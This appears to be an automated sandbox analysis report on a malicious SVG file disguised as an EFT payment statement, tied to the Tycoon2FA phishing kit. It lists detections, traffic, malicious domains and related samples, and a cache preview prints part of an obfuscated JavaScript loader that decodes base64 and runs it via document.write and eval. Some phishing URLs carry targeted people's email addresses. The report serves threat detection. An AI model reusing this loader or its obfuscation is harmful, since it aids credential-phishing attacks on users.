Edit tour

Windows Analysis Report
34209QB_EFT_Payment_Statemt25.svg

Overview

General Information

Sample name:	34209QB_EFT_Payment_Statemt25.svg
Analysis ID:	1648155
MD5:	83f71712cfc6b15893aa00b9c653aac4
SHA1:	4a2f80f14fd7c69d974f778a83b7a9b3a531c70b
SHA256:	19595d0dde03b7ba477a7788e5c4d268a2cefb43178232affbd4c52d3512ef16
Infos:

Detection

Invisible JS, Tycoon2FA

Score:	88
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Yara detected AntiDebug via timestamp check

Yara detected Invisible JS

Yara detected Obfuscation Via HangulCharacter

Yara detected Tycoon 2FA PaaS

AI detected suspicious Javascript

HTML page contains suspicious javascript code

Creates files inside the system directory

Deletes files inside the Windows folder

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Classification

Process Tree

System is w10x64

chrome.exe (PID: 8168 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 7524 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2144,i,17587488231862270499,9783340658686126659,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2172 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 8356 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\34209QB_EFT_Payment_Statemt25.svg" MD5: E81F54E6C1129887AEA47E7D092680BF)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author
1.2.d.script.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
1.2.d.script.csv	JoeSecurity_InvisibleJS	Yara detected Invisible JS	Joe Security
1.3.d.script.csv	JoeSecurity_Tycoon2FA_1	Yara detected Tycoon 2FA PaaS	Joe Security
1.7.d.script.csv	JoeSecurity_Tycoon2FA_1	Yara detected Tycoon 2FA PaaS	Joe Security
1.6..script.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
1.3.d.script.csv	JoeSecurity_AntiDebugBrowser	Yara detected AntiDebug via timestamp check	Joe Security
1.0.pages.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
1.0.pages.csv	JoeSecurity_InvisibleJS	Yara detected Invisible JS	Joe Security
1.1.pages.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
1.1.pages.csv	JoeSecurity_InvisibleJS	Yara detected Invisible JS	Joe Security
Click to see the 5 entries

HTTP traffic detected: POST /report/v4?s=O2WcJ1QI9TH74wznXh55UETT1R4913Oe6pf9d4KuBzroR5PM%2FNprmngMGuTE9HfQO5KKDRlQFf3PEb6043TvoC7dPZ7MdwgCNMKSknxq7NqaD0dFvz5B37pP5yH%2B HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 429Content-Type: application/reports+jsonOrigin: https://zak9.rnltvipi.esUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Mar 2025 14:51:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O2WcJ1QI9TH74wznXh55UETT1R4913Oe6pf9d4KuBzroR5PM%2FNprmngMGuTE9HfQO5KKDRlQFf3PEb6043TvoC7dPZ7MdwgCNMKSknxq7NqaD0dFvz5B37pP5yH%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingserver-timing: cfL4;desc="?proto=TCP&rtt=10444&min_rtt=10261&rtt_var=3979&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2231&delivery_rate=277555&cwnd=171&unsent_bytes=0&cid=244a0342336423a7&ts=425&x=0"Cache-Control: max-age=14400CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 925f39810b248cb3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=105175&min_rtt=104738&rtt_var=22751&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1897&delivery_rate=35127&cwnd=226&unsent_bytes=0&cid=22bc72eb5224ea5b&ts=3592&x=0"

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: unknown	HTTPS traffic detected: 142.251.32.100:443 -> 192.168.2.4:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.232:443 -> 192.168.2.4:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.232:443 -> 192.168.2.4:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.66.137:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 131.253.33.254:443 -> 192.168.2.4:49738 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\scoped_dir8168_1189149415

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\scoped_dir8168_1189149415

Jump to behavior

Source: classification engine

Classification label: mal88.phis.evad.winSVG@23/6@8/6

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2144,i,17587488231862270499,9783340658686126659,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2172 /prefetch:3
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\34209QB_EFT_Payment_Statemt25.svg"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2144,i,17587488231862270499,9783340658686126659,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2172 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Malware Analysis System Evasion

Yara detected AntiDebug via timestamp check

Source: Yara match

File source: 1.3.d.script.csv, type: HTML

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
34209QB_EFT_Payment_Statemt25.svg	2%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
https://zak9.rnltvipi.es/favicon.ico	100%	Avira URL Cloud	malware
https://zak9.rnltvipi.es/ebY7FU/	100%	Avira URL Cloud	malware

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
a.nel.cloudflare.com	35.190.80.1	true	false	high
code.jquery.com	151.101.66.137	true	false	high
zak9.rnltvipi.es	104.21.65.232	true	true	unknown
www.google.com	142.251.32.100	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://zak9.rnltvipi.es/ebY7FU/#Rccate@securustechnologies.com	false		unknown
https://zak9.rnltvipi.es/favicon.ico	false	Avira URL Cloud: malware	unknown
https://code.jquery.com/jquery-3.6.0.min.js	false		high
https://a.nel.cloudflare.com/report/v4?s=O2WcJ1QI9TH74wznXh55UETT1R4913Oe6pf9d4KuBzroR5PM%2FNprmngMGuTE9HfQO5KKDRlQFf3PEb6043TvoC7dPZ7MdwgCNMKSknxq7NqaD0dFvz5B37pP5yH%2B	false		high
https://zak9.rnltvipi.es/ebY7FU/	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.251.32.100	www.google.com	United States	15169	GOOGLEUS	false
151.101.66.137	code.jquery.com	United States	54113	FASTLYUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
104.21.65.232	zak9.rnltvipi.es	United States	13335	CLOUDFLARENETUS	true

Private

IP
192.168.2.4
192.168.2.5

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1648155
Start date and time:	2025-03-25 15:49:50 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	34209QB_EFT_Payment_Statemt25.svg
Detection:	MAL
Classification:	mal88.phis.evad.winSVG@23/6@8/6
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .svg

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.31.69.3, 172.253.122.84, 142.250.65.174, 142.250.80.67, 142.250.80.110, 142.250.72.110, 142.251.35.174, 142.251.32.110, 142.250.81.238, 142.250.81.234, 142.250.176.202, 142.251.35.170, 142.250.65.202, 142.251.40.106, 142.250.80.74, 142.251.32.106, 142.250.65.234, 142.250.80.106, 142.250.72.106, 142.250.64.106, 142.250.80.42, 142.251.40.170, 142.251.40.138, 142.251.40.202, 142.250.80.10, 23.203.176.221, 199.232.214.172, 142.250.65.238, 142.250.65.206, 142.250.176.206, 142.251.40.163, 142.250.81.227, 4.175.87.197
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net, c.pki.goog
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
151.101.66.137	http://facebooksecurity.blogspot.co.uk/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.min.js
	http://novo.oratoriomariano.com/novo/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-3.3.1.min.js
	http://facebooksecurity.blogspot.ch/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.min.js
	http://site9615380.92.webydo.com/?v=1	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.2.min.js
	http://grandprairie-water-damage-restoration.com	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-3.3.1.min.js
	2023121142000021ki01kvjs.html	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-latest.min.js

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
code.jquery.com	Workspace Update.pdf	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.2.137
	https://antiphishing.vadesecure.com/v4?f=NFZ1OXFVNUpJaXhxbWN3aw79TqTxGVr5HS_rj8xy-Dtt3WuOYgiNsT7kSrCL4neS&i=dnZZY1BRdGVud2p5a3J2MkXgKVQslibyjliaROaA9Kc&k=ylKZ&r=eVhRazAzQWpzQlVhVVRabfl7Btopt7tCs6Jhtvvo_JQliQyVoVTnThNthFfLLOv7XziSix9lmqfR7qqdZtpsOw&s=427052c2cb55a4ea4f9c70929c499bda58414514c5d12af8c66341946b20b817&u=https%3A%2F%2Fzmk5ybt5uw.us-east-1.awsapprunner.com%2F%23Xavier.Regnault%40chantiers-atlantique.com	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	suspectTelling clean needful (78.2 KB).msg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.2.137
	https://app.heptabase.com/w/9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.2.137
	http://www.bordgaisenergytheatre.ie	Get hash	malicious	Unknown	Browse	151.101.2.137
	Qvc_Audio-Play.0044.svg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.66.137
	https://www.powr.io/form-builder/i/39342486#page	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.130.137
	https://app.storylane.io/share/cllvhddxirl7	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.2.137
	PAD_[2025-03-24_120914].pdf	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.194.137
	https://events.trustifi.com/api/o/v1/click/67e1c733234184b4ce4f8e2f/fff2f3/37054a/3dc20b/bc3eb8/514a43/16c432/a397cb/c8b81b/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/d2da7c/c26086/829bf6/bead54/704ec1/98daf0/f14b01/f75b40/3bddbc/f38244/49df71/6488f7/9fe5a2/9316cf/d42000/8a1965/9f3267/7b0314/ff3404/33714b/38592e/663c1b/a68c06/81bdb9/55f3ba/3227ca/c52e0b/b3d81e/bc87ef/3e01c3/c02f2b/c10126/2c2594/5e440a/f959ff/c57b2f/efcd67/374391/8b178d/48abaa/b08791/050386/50fe70/daf655/c76e6a/ff2019/597b28/f8c802/04d13e/1f0114/53ccda/d5b926/2701b7/b4e6e7/2cab45/4bd167/f78947/7376ee/dc5bca/d9ca29/561603/a2a34e/11b832/fcbef7/b19b1a/892ca4/7858a9/b64a88/dce9cf/4973dc/0ae7f4/73fc3d/a09197/497515/4c6a00/0d458a#khalid.alyahya@almosafer.com	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	151.101.130.137

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://bbw.name/t3t/out.php?url=https://gamma.app/docs/Bish-Enterprises-c602sxm5n81qwyl?mode=present#card-i5uz51lfyfocdyu	Get hash	malicious	HTMLPhisher	Browse	172.67.206.25
	l7bllBsz8E.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	Pedido de Cota.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.64.1
	https://drive.usercontent.google.com/download?id=1D-lVkrj-b014caeCIdakZBdw2yekeEO1&export=download	Get hash	malicious	HTMLPhisher	Browse	104.26.13.205
	l7bllBsz8E.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	Workspace Update.pdf	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	104.21.3.166
	https://promo-offer.site/tnf_pt	Get hash	malicious	Unknown	Browse	172.64.152.243
	https://mail.webaccess-alerts.net/u/amo3z6ccodm9/login.srf/64a4e3/c86acddf-fba6-4ce4-ae40-3fcb0bfadca2	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://lawful-lamontagne-7e83y.zipwp.top/zipwp-login-67e2afa011731.php	Get hash	malicious	Unknown	Browse	104.26.1.180
	https://lawful-lamontagne-7e83y.zipwp.top/zipwp-login-67e2afa011731.php	Get hash	malicious	Unknown	Browse	104.26.0.180
FASTLYUS	https://bbw.name/t3t/out.php?url=https://gamma.app/docs/Bish-Enterprises-c602sxm5n81qwyl?mode=present#card-i5uz51lfyfocdyu	Get hash	malicious	HTMLPhisher	Browse	151.101.65.55
	Workspace Update.pdf	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.2.137
	https://promo-offer.site/tnf_pt	Get hash	malicious	Unknown	Browse	151.101.193.44
	https://medpetroenergydmcc.com/court/	Get hash	malicious	HTMLPhisher	Browse	151.101.2.132
	https://yousign.app/signatures/f4bc189e-eb94-419a-8c6d-f771bde372b3?s=801791fbcf262c5f0bb15f5752069a2688018a0dba6f5ec910fda8abdadc27ffa3bbd590e9689442d02c12f9e6c4e6ece12f7b0cf847c0521a88de6016075c39&r=34449ad686b12baff90ef39bb3be4334&source=email&lang=fr&magic_link_id=8e2d9b37-150d-4509-9a7a-10125e260c14&domain_id=b48fb217dc&k=zqvNTc7eaLGc3vUtOaMyEtccEILIqP1g	Get hash	malicious	Unknown	Browse	151.101.129.55
	https://antiphishing.vadesecure.com/v4?f=NFZ1OXFVNUpJaXhxbWN3aw79TqTxGVr5HS_rj8xy-Dtt3WuOYgiNsT7kSrCL4neS&i=dnZZY1BRdGVud2p5a3J2MkXgKVQslibyjliaROaA9Kc&k=ylKZ&r=eVhRazAzQWpzQlVhVVRabfl7Btopt7tCs6Jhtvvo_JQliQyVoVTnThNthFfLLOv7XziSix9lmqfR7qqdZtpsOw&s=427052c2cb55a4ea4f9c70929c499bda58414514c5d12af8c66341946b20b817&u=https%3A%2F%2Fzmk5ybt5uw.us-east-1.awsapprunner.com%2F%23Xavier.Regnault%40chantiers-atlantique.com	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	https://we.tl/t-J9PcqXV8XE	Get hash	malicious	Unknown	Browse	151.101.64.84
	suspectTelling clean needful (78.2 KB).msg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	185.199.108.133
	https://app.heptabase.com/w/9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.2.137
	Invoice Number INV132146-1.pdf	Get hash	malicious	Unknown	Browse	199.232.214.172

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://app.storylane.io/share/cllvhddxirl7	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	131.253.33.254
	Legal_Notice_Presentation.pptx	Get hash	malicious	HTMLPhisher	Browse	131.253.33.254
	750413b4e6897a671bc759e04597952a0be747830189873b.bin.exe	Get hash	malicious	LummaC Stealer	Browse	131.253.33.254
	https://jainiklifesciences.com/proposals	Get hash	malicious	HTMLPhisher	Browse	131.253.33.254
	https://sallybarmescounsellor.co.uk/pad4.pdf	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	131.253.33.254
	http://hdm.bdienzelsex.com	Get hash	malicious	Unknown	Browse	131.253.33.254
	Bestellung Nr. 130-25105297.PDF.lnk.download.lnk	Get hash	malicious	Unknown	Browse	131.253.33.254
	2h.bat	Get hash	malicious	Unknown	Browse	131.253.33.254
	https://genee088.activehosted.com/box.php?nl=3&c=5&m=7&s=8d2d537642fe0bc0e87378e9173bb2b4&funcml=unsub2&luha=1	Get hash	malicious	HTMLPhisher	Browse	131.253.33.254
	https://email.double.serviceautopilot.com/c/eJwEwL1OwzAQAOCnsTdbzvl_8MAS2JAoA2Lzz51iKY2jJC3q2_PVcd_z9uot5UK-WFKi4GSFiY5EAFWEdlYF02LB4HlL5CIExzFN3oDTJnjP8Z772lsqlANNUQtrIwnjghJBoRfktVaVCjpQfEktUjYRa4nkA-VGudoCVldXLARneE-gwCoNoOJktJc2EgWTQfmChZxhRrXxKCvKE49nr5gf19j7Oi5Zx52vabmu_WT6jcHMYP79kdvyej3255_Ek8Hcbx9fn9ttbO_jm8HMj1SXo5_X2Bc8ZF7XvDGjjv0Y8sK68GeC_wAAAP__35laBg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	131.253.33.254

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (65364)
Category:	downloaded
Size (bytes):	1094419
Entropy (8bit):	2.269419805392884
Encrypted:	false
SSDEEP:	384:hiVPgc+HjGDYr0iVPgc+HjGDYfLkK2A70cLkK2A70f:hiic6xr0iic6xfLkK90cLkK90f
MD5:	5791FB66D7D6484CAA24BFB199C8AC83
SHA1:	D164C3FCCAAB6A1E5340452660761C3D285BF739
SHA-256:	4B5B41183FC7B7827E14C35C938B5BA82F35D3D916585D96CD4D90E7574C99D1
SHA-512:	4548DC96E271404D7E3EE38BF053D5D8D0C55603AB056218FA367AF0360557FA569ECAC6FC073C88DC497892D06BE97182FA6BDF2948B5FD595E28AFCC4777DB
Malicious:	false
Reputation:	low
URL:	https://zak9.rnltvipi.es/ebY7FU/
Preview:	<script>.QqLrNEtDTc = atob("aHR0cHM6Ly96YWs5LnJubHR2aXBpLmVzL2ViWTdGVS8=");.JplLShNfbS = atob("bm9tYXRjaA==");.KoSIbDtqew = atob("d3JpdGU=");.if(QqLrNEtDTc == JplLShNfbS){.document[KoSIbDtqew](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9RWRnZSxjaHJvbWU9MSI+CiAgICA8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vaW5kZXgsIG5vZm9sbG93Ij4KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4KICAgIDx0aXRsZT4mIzgyMDM7PC90aXRsZT4KICAgIDxzY3JpcHQ+CiAgICBjb25zdCBoRExWaVNJWmJqID0gewogIGdldChGblFHZ0ZrRG1JLCBUZGxockZyVERzKSB7CiAgICBjb25zdCBHa0pDUGZoVnZUID0gWy4uLlRkbGhyRnJURHNdCiAgICAgIC5tYXAoTFZ3S0VoclZYVyA9PiArKCfvvqAnID4gTFZ3S0VoclZYVykpCiAgICAgIC5qb2luKCcnKTsKICAgIGNvbnN0IEljWVp5akdKU3ggPSBHa0pDUGZoVnZULnJlcGxhY2UoLy57OH0vZywgQU9LdnJ2VG1ZeSA9PgogICAgICBTdHJpbmcuZnJvbUNoYXJDb2RlKHBhcnNlSW50KEFPS3ZydlRtWXksIDIpKQogICAgKTsKICAgIHJldHVybiBldmFsKEljWVp5akdKU3gpOwogIH0

Chrome Cache Entry: 55

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	16
Entropy (8bit):	3.5
Encrypted:	false
SSDEEP:	3:H+rYn:D
MD5:	F1C9C44E663E7E62582E3F5B236C1C72
SHA1:	E142F3A0C2D1CDF175A5C3AF43AD66FEFE208B1F
SHA-256:	D843E67FBFA1F5CB0024062861EE26860C5A866F80755CF39B3465459A8538B9
SHA-512:	19FE62CB9D884BB3424C51DD15E74EB22E5A639BABF8398BACEBB781862296FA0D7AEE39C88CB9C7AF5791FD58830AC3433F5C6BD94B1BA3912AB33151E93452
Malicious:	false
Reputation:	moderate, very likely benign file
URL:	https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCZCsGd--W9-hEgUNNzCpMCEyusk5Ewit8A==?alt=proto
Preview:	CgkKBw03MKkwGgA=

Chrome Cache Entry: 56

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65447)
Category:	downloaded
Size (bytes):	89501
Entropy (8bit):	5.289893677458563
Encrypted:	false
